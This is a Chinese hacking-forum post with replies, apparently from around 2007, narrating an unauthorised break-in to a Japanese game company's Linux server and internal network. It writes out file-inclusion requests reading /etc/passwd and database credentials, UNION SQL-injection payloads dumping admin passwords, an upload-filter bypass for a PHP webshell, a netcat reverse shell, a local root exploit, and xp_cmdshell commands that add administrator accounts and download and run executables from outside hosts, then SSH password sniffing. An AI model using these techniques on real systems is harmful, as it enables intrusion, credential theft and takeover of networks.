文章作者：Randy（hellrandy@hotmail.com）
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注意：本文首发狐狸窝（www.wrsky.com），后由原创作者友情提交到邪恶八进制信息安全团队。

  目标:JP
  类型:某官Game
  服务器 linux
  网络环境:20.*.*.*内网组成.路由映射端口.
  本文只是给思路.难免有错大家谅解  希望大家能耐心看完.本人只是鸟一只.
=============国界===============

    好了废话少说开始.站的URL我就拿www.test.com代替.本来想让大家都体会一下.可惜狐狸窝不能发真实地址.
拿到了站大概看了一下.PHP LINUX APACHE MYSQL组成.貌似还有一处用了一个让我无法决定的数据库.首先我们从
整个站的结构开始了解. 拿出WWWSCAN 由于我经常检测国外的站我收集了很多敏感的目录文件等等 当然软件作者
也收集了许多有用的.结果返回大概目录有
/admin/
/config/
/news/
/news/newadmin/
/news/newadmin/test.php
/admin/test.php/info.php
省略..
有用的就这些.因为我最想要的就是后台.至少有了管理员的USER&pASS有了能用的地方.
admin目录访问提示403 newadmin出来一个登录页.丫的开心.请出GOOGLE.
site:test.com inurl:php
site:test.com admin
site:test.com login
site:test.com filetype:php | asp | jsp | aspx | jsp |  由于是想看看其他子站有没有WIN系统.这样好插手.结果只有PHP 而且子站大多都是有HTML组成的
搜到这些大概得到了些信息.大概看到了网站组成脚本的名称 心里感觉可疑的可以注的点.还有一些比较少见的页面.大家SEACH下会有这样的感觉的
打开工具箱.有个FUCKGOOGLE.exe 可以搜集所有GOOGLE搜到的URL 做成一个HTML给你.然后很多链接.大家可以在AD注入工具里打开这个页面让AD扫.
就算AD不是注MYSQL的.至少也分的清楚AND 1=1 和AND 1=2的区别.在AD放了10分钟后看了下结果.没啥好玩的...放弃GOOGLE.{注:这其中大家一定得耐心的观察}
好了没戏了.既然ADMIN目录403就从他那开始下手.随便猜了几个登录页面.RP问题没出来.在WWWSCAN跑了一下 啥都木有..汗. 放弃...
新闻系统啊 新闻系统..你咋就是个新闻系统咧.后台至少可以让我用溯雪跑一下.就算不科学 也碰碰运气... 跑完了没戏 {注:当然在这过程中你可以做其他的)
有了后台我怕 就是认证的问题.到处找点.一直都没找到.有个VOTE.进去看了一下...谁谁谁 %xx. GET了' 出错了.PHP送给我路径. and 1=2 返回结果正常.和1=1没啥区别.汗.再来
/**/and/**/1=2 还是一样 大家当我在放屁吧.放弃 继续找.... 找啊找..突然看到了个这么个URL read4.php?files=include/hellokitty.html 这么个连接. 去掉hellokitty.html PHP提示
Warning: Smarty error: unable to read resource: "include" in  in /home/httpd/html/libs/test.php on line 1095  
嘿嘿 爽了.接着我随便找了一个他们站的图片 提交 read4.php?files=../img/bar_logo.jpg 嘎嘎. 返回的结果是?JFIF
ddDucky
<Adobed
省略....
好继续.提交read4.php?files=../read4.php 返回
<?
require &#39;../libs/xxxx******(假的).php&#39;;
include &#39;sqlfunc_csm2.inc&#39;;
session_start();
.....省略
有进展继续.提交read4.php?files=../sqlfunc_csm2.inc
拿到的当然是MYSQL USER&pASS啦.前提不是ROOT.
好了.虽然没找到点至少找到了一个另类的load_file.不管3721继续攻击!!!
read4.php?files=../../../../../etc/passwd
当然出来咯.找了几个有/BIN/BASH的用户 用MYSQL的密码去尝试SSH结果失败.
不急.再来.我们必须得找到点.花了一个小时的功夫....
还是没找到点.无奈之下用MAXTHON查看源代码.就是表单啦.搜索php 啊.无意中搜到一个很奇怪的页面我在GOOGLE中也没见过 好像是调用的吧.无聊
具体是../dj?msb=908 好家伙打开它...返回让我一滴汗落下来...就出来个3456.最后我才发现这个页面为了统计用户访问的次数.
加了个&#39;出错了. 1=2 1=1. ^_^ 功夫不负有心人. 我注我注我注.我直接注死.
and 1=2/**/union/**/select/**/1,2
好了 返回正常...
and 1=2/**/union/**/select/**/1,user()
返回刚才我暴出来的MYSQL.有些朋友就问了.你都拿到MYSQL密码了.你怎么还不去连人家数据INTO FILE呢?大哥我希望您看清楚.上面我说的结果20.*.*.* 影射..多的废话我不想说.
and 1=2/**/union/**/select/**/1,database()
没错喔.出来的和暴出来的库一样.看你丫的我咋玩你.万事齐全.就是管理员帐号和密码了.
问题来了.表名....这个简单啦.用刚才暴文件的方法去暴login.php或它所POST的文件就可以找到表明了.大家懂我意思吧.继续注
and 1=2/**/union/**/select/**/news_admin,news_password/**/from/**/administrator55991 (BT吧 管理员很有意识)
暴出来了.密码是BASE64 大家可以到http://makcoder.sourceforge.net/demo/base64.php 来解开.或者用CAIN的附加功能.或者一会我给大家发个编码工具非常好用.
好了.拿到帐号密码了.进入后台.编辑新闻和发布新闻.其他的说了浪费时间.当然有上传功能啦.乐呵呵的上传个php. ...
.....
神啊救救我吧.我都够麻烦了..
必须上传JPG或GIF.我砸电脑的念头都有了...
稳定稳定..继续...先找了一个真正的图片.后缀改成.fuck 上传!! 提示成功.看了下上传的后辍.没错.是.fuck.
娘地.原来破东西只检测GIF头.再来.在C99头上加个GIF头GIF89a 上传!!!!
失败!!!!!!!!!!!!!!!!!!!!!
稳定下..传了个加GIF头的JSP和CGI.上传成功 不过人家服务器不解析.
一根烟 出去呼吸一下新鲜空气.突然抽烟的时候灵光一闪...对了!!!
上传后缀为.pHP带GIF头的马儿...哇塞!!!! 成功咧.爽.{注意大家看清楚.PHP Php pHp等等的组合方式 具体原理我就不解释了.各位牛都都知道.速破黑(SUPERHEI)的文章有写
输入密码进入WEBSHELL...既然进来了.我们就搞个顶翻天.
这感觉真好啊.555555.进来以后上传个NSTVIEW.php 进入TOOLS选项. 有个BACKDOOR. 本机执行nc -vvlp 520
点下Start 回来了个SHELL. 好开始提权.拿到肉特....
提交id
nobody.
提交uname -a
废话 不然APACHE白做APACHE啊 白痴!!! -.-
linux 2.4.20 xxxxxxx
其实这中间也很巧合.可能运气好吧.我用brk.c 成功提到肉特...
brk.c 大家可以去www.milw0rm.com seach下...
开始提权...
$gcc brk.c -o brk
$./brk
.....省略....
#sh.x.x
好了.继续.
nmap -v -sS 20.1.0.1/16
返回一大堆.有一台WIN机器.大概是2K.LINUX使上不舒服.先搞定他吧.
开了139 445 1433 3389 5900
#netstat -an
发现这台机器还连接着那台2K的1433 狂喜...
记得前面的ADMIN目录吗?403那个...我大概看了下那个目录的文件仔细观察看.include sql.php 紧张的打开sql.php 哇/se/se/se 运气实在好的不行了..
是SA喔.但是问题又来了...APACHE+LINUX不支持MSSQL啊.我又是菜鸟一只.又不会写PHP... GOOGLE了下搜到了好东西
freetds. LINUX管理MSSQL的工具. 赶快下载下来安装
# wget http://xx.xx.com/freetds.tar.gz
# tar -zxvf freetds.tar.gz
# cd freetd./configure --prefix=/usr/local/freetds --with-tdsver=7.0  
#gmake (生成Makefile，我试验过，make也可以)
#gmake install (安装)
OK了.继续
#cd bin
#./tsql -h 20.1.0.9 -p 1433 -U sa -P XXXX98#4  登录成功后会出现>
>exec master.dbo.xp_cmdshell net user Randy xxxxx /add
>exec master.dbo.xp_cmdshell  net localgroup administrators Randy /add
>exec master.dbo.xp_cmdshell ftp 12.12.12.12 | "Randy" | "121212"|"get down.exe"|"bye"| 我就省略的写了...具体是那个FTP的BAT.大家都知道吧.
>exec master.dbo.xp_cmdshell down.exe http://www.xx.com/vidc.exe VIDC大家都会配置吧.
>exec master.dbo.xp_cmdshell down.exe http://www.xx.com/vidc.ini
>exec master.dbo.xp_cmdshell vidc.exe  (执行之前 本地执行 vidc.exe -p 7777
>exit

好了.VIDC的端口也映射过来了.链接本地的127.0.0.1:7777 进到终端.安装CAIN 开始SNIFF.
那服务器也没人管.1天半后.嗅到了SSH的密码.ROOT $*2323****
全段都是相同帐号密码.就这一台WIN. 就这样网关帐号密码.SSH 等等 更别提数据库了.全让我干了顶朝天...
具体文章里用到的工具大家可以找我要 hellrandy@Homtail.com QQ:686641  Randy
文章难免有错...可能思路比较幼稚...或者别的.反正我人也小.大家凑合着看吧.转载请注明版权.

里面的一些思路不错

btw:brk要静态编译的 :)

我也是凭记忆..

改正

gcc brk.c -o brk -static

天...

文章都放出去这么多天了.1千多的点击率.没有一个人提出问题???别让我损8进制哦..

来点问题大家讨论讨论...

唉...就知道看帖不回木JJ

不是“一次垃圾地入侵”

呵呵 那是zhuzhu的细心及精验，别的没可说的了

我那里还有几个小站的webshell在挂着呢，不知道zhuzhu是否有冲动呀

randy 大哥！FUCKGOOGLE.exe 在什么地方下载？

我在百度&google都找不到这个软件 [s:86]

麻烦你提供一下！ 我觉得这个东西的功能很不错

可以搜集所有GOOGLE搜到的URL 做成一个HTML给你.然后很多链接.大家可以在AD注入工具里打开这个页面让AD扫.

是一个好东西~~分享下！谢谢！

寻FUCKGOOGLE.EXE 这篇文章唯一的问题.汗.`

randy。。。
我也是来寻找那个FUCKGOOGLE.EXE的。。现在google早改版了~我想知道那个东西怎么做到的。

  那是一个加拿大的牛淫给我的...当初我拿AD注入换的/

不过帮翻译成了英文版. 他好像很喜欢的样子 哈哈....

然后就拿了这东西和我交换. 最后让我做系统做没了.我有时间再问他要要 .发出来哈...

引用:

引用第15楼randy于2007-03-24 22:40发表的 :
  那是一个加拿大的牛淫给我的...当初我拿AD注入换的/

不过帮翻译成了英文版. 他好像很喜欢的样子 哈哈....

然后就拿了这东西和我交换. 最后让我做系统做没了.我有时间再问他要要 .发出来哈...

从加拿大进口的呀。。HOHO。。社交蛮广泛的嘛。。Randy。。

思路俺是了解了咯..我回头再仔细看看..

PS:楼主,英语很好吧..呵呵..什么时候也去翻译点好的工具过来啊..呵呵...人家小榕都靠翻译起家了..嘿嘿..

没有想到小榕是靠翻译起的家..

randy呵呵~麻烦你了..

弄到了发出来哈！如果是英文...可以的话翻译一下~~

要是太忙没时间翻译也算了！没关系的..搞到就发出来哈！谢啦！

ps ..不知道有米有fuckbaidu？

哈哈,文章不错,很早就告诉我写了这个文章,今天才有时间看,呵呵,顶一下(扣分就不顶了~)
其实很多老外的站,后台都有include,有include就有shell撒!~哈哈
官方游戏站既然用这么低的内核,我有点无语....

看了大半，觉得“传了个加GIF头的JSP和CGI.上传成功”这点很值得借鉴！不知道有没有批量修改文件头的工具呢？

- -!. 先回答上面哥们的问题。

我传JSP或CGI只是为了打法那个验证文件的脚本.看看做了哪些限制.

所以我先传了.FUCK .多的不说了 你去SUPERHEI的BLOG看一篇文章就明白了.

至于批量改...你如何受这个罪.. 用到啥改啥不就完了.MAYBE 可以用BAT实现.你需要的话 短信我 我给你写一小段哈


再来.

逝水老兄... 你咋才来唉...

老外那J8后台就那样.总比国内管理员有水准.内核低那是因为我撕开了一个口. 可能是没人管的服务器吧..鸟儿..

偶可怜的文章就这么被抛弃了 5555555

邪恶都是木JJ的。除了回帖的淫。。。

偶好心把文章发到这里 连一个破胸章都不给偶 55555555 太小气了吧

。。。。大概看了一遍，看来这个小日本的安全做的真不怎么样，不像日本人的BT做风哦。。。。第一有注射点，第二后台过滤不完整，第三LINUX内核版本低，第四MSSQL是用的SA，第五，服务器的管理员是SB，因为SSH嗅探，管理员尝试登陆服务器时，是会弹出一个提示，说KEY已经改变，可能存在中间人攻击等字样。管理员竟然视警告为不见，继续登陆。。。。汗一个。这样的官方游戏，活该倒闭。。。

楼上的你那么叼，怎么自己不写一篇宇宙无敌比奥特曼亮红灯还厉害的文章出来看看?

哎~~还是回个贴吧
其实我也没啥问题
拿个FUCKGOOGLE.exe

我也问个问题，除了wwwscan还有什么好的扫目录结构的东西能shell么？
玫瑰一直说自己收集了很多，但是没看到放出来，这是个好东西的说。

挖个坟
扫目录结构还是wwwscan暴力来的好
有些站小站可以用整站下载器

fuckgoogle.exe

这样都能找到注入点 牛淫啊

文章看完实在没什么问题!!

顶下吧

我只能顺着楼主的意思看啊,无法参与讨论..

呵呵

楼主说那服务器也没人管，哈哈，看来你运气不错啊，用google来扫，工具都省了，可是google让我失望了很多次，^_^，不过佩服楼主的坚持，用ad我设置了一下认为 还可以吧

[ 本帖最后由 nonceky 于 2008-2-20 11:16 编辑 ]